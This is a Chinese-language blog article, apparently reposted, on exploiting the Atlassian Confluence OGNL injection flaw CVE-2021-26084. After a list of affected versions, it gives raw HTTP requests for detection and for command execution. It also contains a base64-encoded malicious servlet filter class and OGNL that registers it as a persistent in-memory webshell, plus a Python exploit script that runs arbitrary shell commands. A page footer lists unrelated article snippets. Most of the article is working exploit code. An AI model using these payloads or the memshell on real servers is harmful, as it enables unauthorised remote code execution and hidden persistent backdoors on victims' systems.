Atlassian Confluence OGNL表达式注入RCE CVE-2021-26084

影响版本

  • All 4.x.x versions

  • All 5.x.x versions

  • All 6.0.x versions

  • All 6.1.x versions

  • All 6.2.x versions

  • All 6.3.x versions

  • All 6.4.x versions

  • All 6.5.x versions

  • All 6.6.x versions

  • All 6.7.x versions

  • All 6.8.x versions

  • All 6.9.x versions

  • All 6.10.x versions

  • All 6.11.x versions

  • All 6.12.x versions

  • All 6.13.x versions before 6.13.23

  • All 6.14.x versions

  • All 6.15.x versions

  • All 7.0.x versions

  • All 7.1.x versions

  • All 7.2.x versions

  • All 7.3.x versions

  • All 7.4.x versions before 7.4.11

  • All 7.5.x versions

  • All 7.6.x versions

  • All 7.7.x versions

  • All 7.8.x versions

  • All 7.9.x versions

  • All 7.10.x versions

  • All 7.11.x versions before 7.11.6

  • All 7.12.x versions before 7.12.5

环境搭建

Atlassian Confluence 搭建和调试

漏洞复现

参考:https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md

检测

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45queryString=aaaa\u0027%2b#{3*333}%2b\u0027bbb

返回包出现999即可证明ognl表达式成功执行。说明漏洞存在。

利用

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 0.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: seraph.confluence=10420225%3A99812635f8ead516748600dabcae6fb275114958; JSESSIONID=8476B9EB2D8EF2235053A3CB8A2C0500
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 310queryString=aaa\u0027%2b#{\u0022\u0022[\u0022class\u0022].forName(\u0022javax.script.ScriptEngineManager\u0022).newInstance().getEngineByName(\u0022js\u0022).eval(\u0022var x=new java.lang.ProcessBuilder;x.command([\u0027/bin/bash\u0027,\u0027-c\u0027,\u0027touch /tmp/hacked\u0027]);x.start()\u0022)}%2b\u0027

注入内存马

POST /pages/doenterpagevariables.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 3326
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/pages/doenterpagevariables.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=55BF0FB2FF4C8731D707970E03B845CB
Connection: closequeryString=lalalala%5Cu0027%2C%28linkCreation%29%280xd0ff90%29%2C%5Cu0027lalalala&linkCreation=%23a%3D%40java.lang.Thread%40currentThread%28%29.getContextClassLoader%28%29%2C%23classfile%3D%22yv66vgAAADQAZwoAEwA4BwA5CAA6CwACADsHADwHAD0IAD4IAD8KAAUAQAoABQBBCgBCAEMKAEQARQsARgBHCgAGAEgKAEkASgoAQgBLCwBMAE0HAE4HAE8HAFABAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEADExFdmlsRmlsdGVyOwEABGluaXQBAB8oTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOylWAQAMZmlsdGVyQ29uZmlnAQAcTGphdmF4L3NlcnZsZXQvRmlsdGVyQ29uZmlnOwEACkV4Y2VwdGlvbnMHAFEBAAhkb0ZpbHRlcgEAWyhMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7TGphdmF4L3NlcnZsZXQvRmlsdGVyQ2hhaW47KVYBAAVieXRlcwEAAltCAQAHcHJvY2VzcwEAE0xqYXZhL2xhbmcvUHJvY2VzczsBAANsZW4BAAFJAQAOc2VydmxldFJlcXVlc3QBAB5MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDsBAA9zZXJ2bGV0UmVzcG9uc2UBAB9MamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7AQALZmlsdGVyQ2hhaW4BABtMamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbjsBAANyZXEBACdMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdDsBAA1TdGFja01hcFRhYmxlBwA5BwBSAQAHZGVzdHJveQEAClNvdXJjZUZpbGUBAA9FdmlsRmlsdGVyLmphdmEMABUAFgEAJWphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlcXVlc3QBAANjbWQMAFMAVAEAGGphdmEvbGFuZy9Qcm9jZXNzQnVpbGRlcgEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMMABUAVQwAVgBXBwBYDABZAFoHAFsMAFwAXQcAXgwAXwBgDAAVAGEHAGIMAGMAZAwANQAWBwBlDAAiAGYBAApFdmlsRmlsdGVyAQAQamF2YS9sYW5nL09iamVjdAEAFGphdmF4L3NlcnZsZXQvRmlsdGVyAQAeamF2YXgvc2VydmxldC9TZXJ2bGV0RXhjZXB0aW9uAQATamF2YS9pby9JT0V4Y2VwdGlvbgEADGdldFBhcmFtZXRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABXN0YXJ0AQAVKClMamF2YS9sYW5nL1Byb2Nlc3M7AQARamF2YS9sYW5nL1Byb2Nlc3MBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQATamF2YS9pby9JbnB1dFN0cmVhbQEABHJlYWQBAAUoW0IpSQEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlAQAJZ2V0V3JpdGVyAQAXKClMamF2YS9pby9QcmludFdyaXRlcjsBAAcoW0JJSSlWAQATamF2YS9pby9QcmludFdyaXRlcgEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAZamF2YXgvc2VydmxldC9GaWx0ZXJDaGFpbgEAQChMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVxdWVzdDtMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7KVYAIQASABMAAQAUAAAABAABABUAFgABABcAAAAvAAEAAQAAAAUqtwABsQAAAAIAGAAAAAYAAQAAAAcAGQAAAAwAAQAAAAUAGgAbAAAAAQAcAB0AAgAXAAAANQAAAAIAAAABsQAAAAIAGAAAAAYAAQAAAAsAGQAAABYAAgAAAAEAGgAbAAAAAAABAB4AHwABACAAAAAEAAEAIQABACIAIwACABcAAAERAAcACAAAAG8rwAACOgQZBBIDuQAEAgDGAFcRBAC8CDoFuwAFWQa9AAZZAxIHU1kEEghTWQUZBBIDuQAEAgBTtwAJtgAKOgYZBrYACxkFtgAMNgcsuQANAQC7AAZZGQUDFQe3AA62AA8ZBrYAELEtKyy5ABEDALEAAAADABgAAAAqAAoAAAAPAAYAEAASABEAGQASAD8AEwBLABQAYAAVAGUAFgBmABgAbgAZABkAAABSAAgAGQBNACQAJQAFAD8AJwAmACcABgBLABsAKAApAAcAAABvABoAGwAAAAAAbwAqACsAAQAAAG8ALAAtAAIAAABvAC4ALwADAAYAaQAwADEABAAyAAAACAAB%2FABmBwAzACAAAAAGAAIANAAhAAEANQAWAAEAFwAAACsAAAABAAAAAbEAAAACABgAAAAGAAEAAAAeABkAAAAMAAEAAAABABoAGwAAAAEANgAAAAIANw%3D%3D%22%2C%23ClassLoaderClass%3D%40java.lang.Class%40forName%28%22java.lang.ClassLoader%22%29%2C%23defineClassMethod%3D%23ClassLoaderClass.getDeclaredMethods%28%29%5B21%5D%2C%23defineClassMethod.setAccessible%28true%29%2C%23classbytes+%3D+%40java.util.Base64%40getDecoder%28%29.decode%28%23classfile%29%2C%23b%3Dnew+java.lang.Object%5B%5D%7B%23classbytes%2C+new+java.lang.Integer%280%29%2C+new+java.lang.Integer%28%23classbytes.length%29%7D%2C%23defineClassMethod.invoke%28%23a%2C+%23b%29%2C%40java.lang.System%40out.println%28%22Success%22%29
POST /pages/doenterpagevariables.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 1934
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/pages/doenterpagevariables.action
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=55BF0FB2FF4C8731D707970E03B845CB
Connection: closequeryString=lalalala%5Cu0027%2C%28linkCreation%29%280xd0ff90%29%2C%5Cu0027lalalala&linkCreation=%23a%3D%40java.lang.Thread%40currentThread%28%29.getContextClassLoader%28%29%2C%23filter%3D%23a.loadClass%28%22EvilFilter%22%29.newInstance%28%29%2C%23name%3Dnew+java.lang.String%28%22memshell%22%29%2C%23context1%3D%23a.getResources%28%29.getContext%28%29%2C%23appctx%3D%23context1.getClass%28%29.getDeclaredField%28%22context%22%29%2C%23appctx.setAccessible%28true%29%2C%23applicationContext%3D%23appctx.get%28%23context1%29%2C%23stdctx%3D%23applicationContext.getClass%28%29.getDeclaredField%28%22context%22%29%2C%23stdctx.setAccessible%28true%29%2C%23standardContext%3D%23stdctx.get%28%23applicationContext%29%2C%23Configs%3D%23standardContext.getClass%28%29.getDeclaredField%28%22filterConfigs%22%29%2C%23Configs.setAccessible%28true%29%2C%23filterConfigs%3D%23Configs.get%28%23standardContext%29%2C%23filterDef%3Dnew+org.apache.tomcat.util.descriptor.web.FilterDef%28%29%2C%23filterDef.setFilter%28%23filter%29%2C%23filterDef.setFilterName%28%23name%29%2C%23filterDef.setFilterClass%28%23filter.getClass%28%29.getName%28%29%29%2C%23standardContext.addFilterDef%28%23filterDef%29%2C%23filterMap%3Dnew+org.apache.tomcat.util.descriptor.web.FilterMap%28%29%2C%23filterMap.addURLPattern%28%27%2F*%27%29%2C%23filterMap.setFilterName%28%23name%29%2C%23filterMap.setDispatcher%28%40javax.servlet.DispatcherType%40REQUEST.name%28%29%29%2C%23standardContext.addFilterMapBefore%28%23filterMap%29%2C%23constructor1%3D%40java.lang.Class%40forName%28%22org.apache.catalina.core.ApplicationFilterConfig%22%29.getDeclaredConstructors%28%29%5B0%5D%2C%23constructor1.setAccessible%28true%29%2C%23parameters%3Dnew+java.lang.Object%5B%5D%7B%23standardContext%2C%23filterDef%7D%2C%23filterConfig%3D%23constructor1.newInstance%28%23parameters%29%2C%23filterConfigs.put%28%23name%2C%23filterConfig%29%2C%40java.lang.System%40out.println%28%22Success%22%29
  • 加载恶意filter类
queryString=lalalala\u0027,(linkCreation)(0xd0ff90),\u0027lalalala&linkCreation=
#a=@java.lang.Thread@currentThread().getContextClassLoader(),
#classfile="恶意filter class文件base64",
#ClassLoaderClass=@java.lang.Class@forName("java.lang.ClassLoader"),
#defineClassMethod=#ClassLoaderClass.getDeclaredMethods()[21],
#defineClassMethod.setAccessible(true),
#classbytes = @java.util.Base64@getDecoder().decode(#classfile),
#b=new java.lang.Object[]{#classbytes, new java.lang.Integer(0), new java.lang.Integer(#classbytes.length)},
#defineClassMethod.invoke(#a, #b),
@java.lang.System@out.println("Success")
  • 注册Filter
queryString=lalalala\u0027,(linkCreation)(0xd0ff90),\u0027lalalala&linkCreation=
#a=@java.lang.Thread@currentThread().getContextClassLoader(),
#filter=#a.loadClass("恶意Filter名称").newInstance(),
#name=new java.lang.String("memshell"),
#context1=#a.getResources().getContext(),
#appctx=#context1.getClass().getDeclaredField("context"),
#appctx.setAccessible(true),#applicationContext=#appctx.get(#context1),
#stdctx=#applicationContext.getClass().getDeclaredField("context"),
#stdctx.setAccessible(true),
#standardContext=#stdctx.get(#applicationContext),
#Configs=#standardContext.getClass().getDeclaredField("filterConfigs"),
#Configs.setAccessible(true),
#filterConfigs=#Configs.get(#standardContext),
#filterDef=new org.apache.tomcat.util.descriptor.web.FilterDef(),
#filterDef.setFilter(#filter),
#filterDef.setFilterName(#name),
#filterDef.setFilterClass(#filter.getClass().getName()),
#standardContext.addFilterDef(#filterDef),
#filterMap=new org.apache.tomcat.util.descriptor.web.FilterMap(),
#filterMap.addURLPattern('/*'),
#filterMap.setFilterName(#name),
#filterMap.setDispatcher(@javax.servlet.DispatcherType@REQUEST.name()),
#standardContext.addFilterMapBefore(#filterMap),
#constructor1=@java.lang.Class@forName("org.apache.catalina.core.ApplicationFilterConfig").getDeclaredConstructors()[0],
#constructor1.setAccessible(true),
#parameters=new java.lang.Object[]{#standardContext,#filterDef},
#filterConfig=#constructor1.newInstance(#parameters),
#filterConfigs.put(#name,#filterConfig),
@java.lang.System@out.println("Success")

exp

import requests
import re
import sysdef login(sess):data = {"os_username": "admin","os_password": "admin","login": "登录"}sess.post("http://127.0.0.1:8090/dologin.action", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})return sessdef exp1():sess = requests.Session()sess = login(sess)data = {"featureKey": payload}res = sess.post("http://127.0.0.1:8090/users/darkfeatures.action", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})result = re.findall('value="{(.*)=null}', re.findall('<input type="text" name="featureKey" id="featureKey"(.*)class="text', res.text)[0].strip())[0].replace("$$", "\n")return resultdef exp2():sess = requests.Session()url = "http://127.0.0.1:8090/pages/doenterpagevariables.action"data = {"queryString": payload}res = sess.post(url, data=data, proxies={"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"})result = re.findall('value="{(.*)=null}', re.findall('name="queryString"(.*)/>', res.text)[0].strip())[0].replace("$$", "\n")return resultdef isWin():return Truedef main():res = exp2()print(res)if __name__ == '__main__':cmd = "ls -al"cmd = sys.argv[1]payload = """\\u0027+#{\\u0022\\u0022[\\u0022class\\u0022].forName(\\u0022javax.script.ScriptEngineManager\\u0022).newInstance().getEngineByName(\\u0022js\\u0022).eval(\\u0022var a=new java.lang.ProcessBuilder(\\u0027/bin/bash\\u0027,\\u0027-c\\u0027,\\u0027"""+cmd+"""\\u0027);var b=new java.io.InputStreamReader(a.start().getInputStream(),\\u0027gbk\\u0027);var c=new java.io.BufferedReader(b);var sb = new java.lang.StringBuffer();while((line=c.readLine())!=null){sb.append(line+\\u0027$$\\u0027);}sb.toString();\\u0022)}+\\u0027"""main()

参考资料

漏洞通告

  • 【漏洞通告】Atlassian Confluence 远程代码执行漏洞(CVE-2021-26084) (qq.com)
  • Confluence Security Advisory - 2021-08-25 | Confluence Data Center and Server 7.13 | Atlassian Documentation
  • [CONFSERVER-67940] Confluence Server Webwork OGNL injection - CVE-2021-26084 - Create and track feature requests for Atlassian products.
  • [JRASERVER-70944] Make use of Secure Introspector in Velocity Templates - CVE-2019-20409 - Create and track feature requests for Atlassian products.

漏洞分析

  • writeups/Confluence-RCE.md at main · httpvoid/writeups (github.com)
  • 暂时无法在文档外展示此内容

POC/EXP

  • h3v0x/CVE-2021-26084_Confluence: Confluence Server Webwork OGNL injection (github.com)
  • dinhbaouit/CVE-2021-26084 (github.com)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/112430.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

RK3568笔记四:基于TensorFlow花卉图像分类部署

若该文为原创文章&#xff0c;转载请注明原文出处。 基于正点原子的ATK-DLRK3568部署测试。 花卉图像分类任务&#xff0c;使用使用 tf.keras.Sequential 模型&#xff0c;简单构建模型&#xff0c;然后转换成 RKNN 模型部署到ATK-DLRK3568板子上。 在 PC 使用 Windows 系统…

使用telegram机器人发送通知

文章目录 背景1 创建机器人2 与机器人的会话3 调用API让机器人发送消息 背景 在训练深度学习模型时&#xff0c;除了粗略估计外&#xff0c;很难预测训练何时结束。此外&#xff0c;我们可能还想随时随地查看训练情况&#xff0c;如果每次都需要登录回服务器的话并不方便。因此…

wordpress网站部署了ssl证书之后就排版混乱了

刚给自己的小网站部署了SSL证书&#xff0c;之后就发现https访问主页竟然乱套了。在手机上访问却是正常的。 直接上解决方案&#xff1a; 编辑网站根目录下的wp-config.php文件 在自定义文本处添加以下代码&#xff1a; if ($_SERVER[HTTP_X_FORWARDED_PROTO] https) $_SE…

PHP-FFMpeg 操作音视频

✨ 目录 &#x1f388; 安装PHP-FFMpeg&#x1f388; 视频中提取一张图片&#x1f388; 视频中提取多张图片&#x1f388; 调整视频大小&#x1f388; 视频添加水印&#x1f388; 生成音频波形&#x1f388; 音频转换&#x1f388; 给音频添加元数据&#x1f388; 拼接多个音视…

利用ArcGIS获取每一个冰川的中心位置经纬度坐标:要素转点和要素折点转点的区别

问题概述&#xff1a;下图是天山地区的冰川的分布&#xff0c;我们可以看到每一条冰川是一个面要素&#xff0c;要求得到每一个冰川&#xff08;面要素&#xff09;的中心经纬度坐标。 1.采用要素转点功能 选择工具箱的【数据管理工具】-【要素】-【要素转点】。完成之后再采用…

计算机基础知识36

数据库数据的演变史 ATM&#xff1a;1. 把数据都存在了文件中&#xff0c;文件名不规范 kevin|123 kevin123 kevin*123 2. 存储数据的文件越来越多&#xff0c;放在db文件夹&#xff0c;占用空间&#xff0c;查询存储不方便&#xff0c;速度慢 # 数据库软件能解…

lnmp架构部署Discuz论坛并配置重定向转发

lnmp架构部署Discuz论坛并配置重定向转发 文章目录 lnmp架构部署Discuz论坛并配置重定向转发环境说明部署Discuz论坛系统下载Discuz论坛系统代码包&#xff0c;官网地址如下&#xff1a;部署Discuz论坛系统步骤&#xff1a;解压安装Discuz源码包配置虚拟主机进入Discuz安装界面…

Janus: 逆向思维,以数据为中心的MoE训练范式

文章链接&#xff1a;Janus: A Unified Distributed Training Framework for Sparse Mixture-of-Experts Models 发表会议: ACM SIGCOMM 2023 (计算机网络顶会) 目录 1.背景介绍all-to-allData-centric Paradigm 2.内容摘要关键技术Janus细粒度任务调度拓扑感知优先级策略预取…

Android推送问题排查

针对MobPush智能推送服务在使用过程中可能出现的问题&#xff0c;本文为各位开发者们带来了针对MobPush安卓端推送问题的解决办法。 TCP在线推送排查 排查TCP在线收不到推送时&#xff0c;我们先通过客户端的RegistrationId接口获取设备的唯一标识 示例&#xff1a; MobPush…

代码随想录算法训练营第五十六天 | 1143.最长公共子序列、1035.不相交的线 、53. 最大子序和 动态规划

1143.最长公共子序列 视频讲解&#xff1a;动态规划子序列问题经典题目 | LeetCode&#xff1a;1143.最长公共子序列_哔哩哔哩_bilibili 代码随想录 &#xff08;1&#xff09;代码 1035.不相交的线 视频讲解&#xff1a;动态规划之子序列问题&#xff0c;换汤不换药 | Leet…

高数二阶导数例子

例子&#xff1a; 当 x 0 x 0 x0时 f(x) 1&#xff0c;当 x ≠ 0 x \ne 0 x0时&#xff0c; f ( x ) sin ⁡ x x f(x) \frac{\sin x}{x} f(x)xsinx​, 求f’(x)。 解&#xff1a; 二阶导数是导数的导数&#xff0c;按照定义为&#xff1a; f ′ ′ ( x ) lim ⁡ x →…

基于Java的垃圾分类管理系统设计与实现(源码+lw+部署文档+讲解等)

文章目录 前言具体实现截图论文参考详细视频演示为什么选择我自己的网站自己的小程序&#xff08;小蔡coding&#xff09; 代码参考数据库参考源码获取 前言 &#x1f497;博主介绍&#xff1a;✌全网粉丝10W,CSDN特邀作者、博客专家、CSDN新星计划导师、全栈领域优质创作者&am…

安卓逆向之抽象函数public abstract的hook定位处理

一、抽象类调用过程 1、定义接口 public abstract class AbsNetHelper{public abstract int X(int x,int y); }2、其他类调用 public class f extends AbsNetHelper {public abstract int X(int x,int y){ return xy;} }二、如何HOOK 想hook调用AbsNetHelper类的X抽…

linux uboot kenerl filesystem关系

每次烧写都是uboot&#xff0c;image&#xff0c;roots&#xff0c;为什么不整一套&#xff0c;为什么分开 什么是uboot 什么是内核&#xff0c;三者为什么分开 如果你上网去搜一下&#xff0c;你会发现这样的答案 另注&#xff1a;本文含有大量的错误和意测成份&#xff0c…

Linux系统编程04

进程的概念 进程&#xff08;动态&#xff09;是一个正在运行的程序&#xff08;静态&#xff09; 多道程序设计缺点&#xff1a; &#xff08;1&#xff09;缺乏隔离&#xff0c;各个程序之间可以直接访问&#xff0c;使用对方的数据 &#xff08;2&#xff09;内存使用率低&a…

香港服务器在国内访问太慢怎么能提高?

​  一直以来&#xff0c;全球化业务需求的增长是跟随着蓬勃向上的互联网而发展的。有了网络&#xff0c;海外贸易就在鼠标的轻点中完成。而IDC市场中的香港服务器也因为免备案政策的特性&#xff0c;开始逐渐成为企业想要跨越地域壁垒而考虑的对象。但在使用过程中&#xff…

新手如何找到Docker容器(redis)中的持久化文件?

具体步骤 要查看Docker容器的dump.rdb和appendonly.aof文件&#xff08;如果启用了AOF持久化&#xff09;的位置&#xff0c;我们需要知道容器中Redis配置文件的内容或者容器的数据卷的挂载位置。 这里是一般步骤&#xff1a; 查找容器的数据卷挂载位置 使用docker inspect命令…

内存爆炸、CPU100%问题定位

目录 一、内存爆炸相关1、关于-Xms(最小堆内存)和-Xmx(最大堆内存)2、JVM初始化时申请实际物理内存3、OutOfMemory问题排查(1) 堆内存溢出排查(2) 堆外内存溢出排查 二、CPU 100及死锁问题定位1、CPU 100问题排查(1) 找到程序对应进程号(2) 查找进程对应的线程编号(3)查看线程堆…

零基础入门网络渗透到底要怎么学?_网络渗透技术自学

前言&#xff1a; 很多朋友问我&#xff0c;想搞网络安全&#xff0c;编程重要吗&#xff0c;选什么语言呢&#xff1f; 国内其实正经开设网络安全专业的学校很少&#xff0c;大部分同学是来自计算机科学、网络工程、软件工程专业的&#xff0c;甚至很多非计算机专业自学的。…

驱动day2:LED灯实现三盏灯的亮灭

head.h #ifndef __HEAD_H__ #define __HEAD_H__ #define PHY_PE_MODER 0x50006000 #define PHY_PF_MODER 0x50007000 #define PHY_PE_ODR 0x50006014 #define PHY_PF_ODR 0x50007014 #define PHY_RCC 0x50000A28#endif 应用程序 #include <stdio.h> #include <sys/…